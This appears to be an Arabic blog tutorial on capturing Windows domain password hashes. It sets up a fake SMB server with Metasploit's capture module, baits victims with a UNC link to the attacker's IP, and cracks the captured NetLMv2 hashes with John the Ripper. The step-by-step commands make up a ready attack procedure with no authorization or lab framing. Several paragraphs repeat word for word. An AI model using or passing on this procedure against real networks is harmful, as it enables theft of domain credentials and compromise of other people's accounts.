عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين
كيف نحصل على كلمات مرور الدومين دون مهاجمة وحدة تحكم الدومين المحصنة؟
واحدة من أكثر الميزات القوية المضمنة في Metasploit هي القدرة على إعداد خادم SMB مزيف.
واحدة من أكثر الميزات القوية المضمنة في Metasploit هي القدرة على إعداد خادم SMB مزيف.
هذا يعني أنه عندما يحاول شخص ما على الشبكة الوصول إلى خادم SMB ، سيحتاج نظامه إلى تقديم بيانات اعتماده من حيث تجزئة كلمة مرور الدومين الخاصة به. في كثير من الأحيان ، يكون للشبكات الكبيرة نظام يتصل بشكل منهجي بكل جهاز للتحقق مما إذا كانت مصححة وآمنة. عندما تفعل ذلك ، يجب عليها تقديم بيانات اعتمادها إلى كل نظام ، وسوف يستخدم هذا عادةً كلمة مرور المسؤول. إذا كنا صبورًا ، فقد تكون هذه هي أفضل استراتيجية.
بالإضافة إلى ذلك ، من خلال إعداد خادم SMB المزيف هذا ، قد نتمكن من التقاط بيانات اعتماد الدومين عندما يحاول المستخدمون المصادقة authentication عليها. يمكننا إرسال الهدف إلى مسار UNC مضمن ، وعند النقر عليه ، يمكننا الحصول على بيانات اعتماد مجالهم.
على عكس بعض هجمات Metasploit الأخرى ، فإن هذا لا يمثل استغلالًا أو حمولة. إنها وحدة مساعدة ، وهي قادرة على التقاط التجزئة بتنسيق يمكن كسره باستخدام الادوات إما Cain و Abel أو John the Ripper.
بالإضافة إلى ذلك ، من خلال إعداد خادم SMB المزيف هذا ، قد نتمكن من التقاط بيانات اعتماد الدومين عندما يحاول المستخدمون المصادقة authentication عليها. يمكننا إرسال الهدف إلى مسار UNC مضمن ، وعند النقر عليه ، يمكننا الحصول على بيانات اعتماد مجالهم.
على عكس بعض هجمات Metasploit الأخرى ، فإن هذا لا يمثل استغلالًا أو حمولة. إنها وحدة مساعدة ، وهي قادرة على التقاط التجزئة بتنسيق يمكن كسره باستخدام الادوات إما Cain و Abel أو John the Ripper.
الخطوة الاولى :- تشغيل الميتاسبلويت
لنبدا بفتح الاداة المفضلة الميتاسبلويت بكتابة
الخطوة الثانية :- نقوم بإعداد خادم SMB
الآن بعد أن فتح Metasploit ، فلنقم بإعداد خادم SMB مزيف. على عكس بعض هجمات Metasploit الأخرى ، فإن هذا الهجوم ليس استغلالًا أو حمولة ، بل هو وحدة مساعدة. يمكننا تشغيله عن طريق كتابة
use auxiliary/server/capture/smb
الآن بعد أن قمنا بتحميل هذه الوحدة ، دعونا نلقي نظرة على الخيارات التي نحتاج إلى ضبطها لاستخدام هذه الوحدة.
show options
كما ترى ، تحتوي هذه الوحدة على العديد من الخيارات ، لكن يمكننا ترك الإعدادات الافتراضية على كل منها ، باستثناء نوع الملف لتخزين التجزئة للتكسير.
لاحظ ، لقد أبرزت خيار JOHNPWFILE أعلاه. لدينا أيضا CAINPWFILE في القمة. تتيح لنا هذه الخيارات تحديد تنسيق الملف الذي يقوم بتخزين hashes للكراك بواسطة ادوات Cain و Abel أو John the Ripper. في هذا البرنامج التعليمي ، سأستخدم الأداة الأخيرة.
للقيام بذلك ، أريد ببساطة أن أخبر هذه الوحدة النمطية "بتعيين" JOHNPWFILE إلى موقع معين عن طريق كتابة:
لاحظ ، لقد أبرزت خيار JOHNPWFILE أعلاه. لدينا أيضا CAINPWFILE في القمة. تتيح لنا هذه الخيارات تحديد تنسيق الملف الذي يقوم بتخزين hashes للكراك بواسطة ادوات Cain و Abel أو John the Ripper. في هذا البرنامج التعليمي ، سأستخدم الأداة الأخيرة.
للقيام بذلك ، أريد ببساطة أن أخبر هذه الوحدة النمطية "بتعيين" JOHNPWFILE إلى موقع معين عن طريق كتابة:
set JOHNPWFILE /root/domainhashes
الآن ، كل ما تبقى للقيام به هو كتابة
exploit
عندما نكتب "exploit" ، ستبدأ هذه الوحدة في تشغيل خادم SMB مزيف يقوم بتخزين بيانات الاعتماد المقدمة في /root directory في الملفات التي تبدأ بـ "johnhashes".
الخطوة الثالثة :- share
الآن بعد أن تم تشغيل خادم SMB الخاص بنا ، نحتاج إلى شخص ما لمحاولة تسجيل الدخول إلى مشاركتنا. يمكننا القيام بذلك عن طريق إرسال رابط UNC لمشاركتنا ، مثل:
net use \\192.168.1.106 arab-cyber
عند النقر على هذا الرابط ، سيتم تقديم بيانات دومين الخاصة بهم إلى خادم SMB الخاص بنا والتقاطها كما في الصورة أدناه.
الخطوة الرابعة :- Crack the Hash
الخطوة الأخيرة هي crack the hashes للحصول على كلمة المرور. نحن بحاجة للذهاب إلى /root directory للعثور على ملفات hash المحفوظة.
cd /root
كما ترون ، هناك نوعان من hashes المخزن هنا. الآن للقضاء عليهم ، يمكننا استخدام John the Ripper بكتابة:
john johnhashes_netlmv2
عندما نقوم بذلك ، يقوم John the Ripper بتحميل كلمة مرور hash ، والتعرف على نوع hash، ويبدأ في عمل كراك لها اي فكها.
إرسال تعليق